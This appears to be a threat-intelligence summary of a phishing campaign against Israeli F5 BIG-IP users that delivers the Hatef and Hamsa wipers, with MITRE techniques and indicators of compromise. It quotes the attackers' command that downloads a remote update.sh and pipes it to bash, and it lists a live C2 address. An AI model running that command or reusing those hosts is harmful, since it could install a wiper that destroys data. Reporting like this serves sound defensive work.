Operation HamsaUpdate is a sophisticated phishing-driven campaign targeting Israeli users of F5 BIG-IP devices, delivering Windows and Linux wipers Hatef and Hamsa via a multi-stage loader. It features a Delphi-based second-stage loader Handala and an AutoIt injector, with public IOCs released by the Israel National Cyber Directorate. #Hatef #Hamsa #Handala #HandalaHackTeam #F5BIGIP #INCD
Keypoints
- The campaign uses Hebrew-language phishing to pressure victims into running malicious code on their servers.
- Two wipers are deployed: Hatef on Windows and Hamsa on Linux, each with a distinct loader/primer chain.
- A Delphi-based second-stage loader named Handala orchestrates execution and an AutoIt injector is involved in the chain.
- Handala can detect and attempt to disable security software, indicating defense evasion efforts.
- IOCs include a C2 in the 31.192.237.207:2515 range and a Linux update script URL, among multiple file hashes and filenames.
- The activity includes public attribution talk from Handala Hack Team, though formal attribution remains uncertain.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The campaign relies on a crafted Hebrew phishing email pressing victims to run a file. Quote: “The attack is initiated with a cleverly crafted phishing email … pressuring victims to execute the harmful code residing on their servers.”
- [T1059.004] Unix Shell – Linux payload uses a Bash command: “wget -O – https://sjc1.vultrobjects.com/f5update/update.sh | bash”.
- [T1027] Obfuscated/Compressed Files or Information – The Linux payload is described as “obfuscated … five Base64 encoding steps”. Quote: “The payload, obscured using a series of five Base64 encoding steps”.
- [T1140] Deobfuscate/Decode Files or Information – The decoding process is described as mirroring the Delphi loader and involves removing ‘^’ characters to decode strings. Quote: “The decoding process mirrors that of the Delphi loader … eliminate the ‘^’ character.”
- [T1562.001] Impair Defenses – The Delphi/Handala loader includes steps to “detect any active security software … and disable it.”
- [T1485] Data Destruction – The wipers wipe key system paths (Users, Program Files, Windows) and delete directories after erasing files. Quote: “The wiper wipes key system paths … and deletes them.”
- [T1041] Exfiltration Over C2 Channel – The wipers send updates to a Telegram channel with host IP/hostname and disk info. Quote: “sends periodic updates to a predetermined Telegram chat… external IP address”.
- [T1543.003] Windows Service – The loader runs a Service class, indicating use of Windows Service-style execution. Quote: “spawn a new class instance named Service and invokes its Run method.”
- [T1055] Process Injection – Handala injector activity includes injecting into a Windows Media Player Process after stealth/obfuscation steps. Quote: “the code is then injected into a Windows Media Player Process.”
- [T1064] Scripting – The Delphi/AutoIt components leverage scripting mechanisms (AutoIt/Delphi-based loaders). Quote: “The AutoIt loader … Naples.pif is a renamed AutoIt interpreter.”
Indicators of Compromise
- [IP] C2/command channel – 31.192.237.207:2515
- [URL] Command or loader delivery – https://sjc1.vultrobjects.com/f5update/update.sh
- [File Name] Windows payload – Hatef.exe
- [File Name] Windows loader – F5UPDATER.exe
- [File Name] Windows injector – Handala.exe
- [File Name] Loader/AutoIt interpreter – Naples.pif
- [SHA256] Windows Executable.NET – fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2
- [SHA256] Windows Executable.NET – ca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a
- [SHA256] ZIP container – ad66251d9e8792cf4963b0c97f7ab44c8b68101e36b79abc501bee1807166e8a
- [SHA256] AutoIt Interpreter – f58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3
- [SHA256] AutoIt Script – aae989743dddc84adef90622c657e45e23386488fa79d7fe7cf0863043b8acd4
Read more: https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/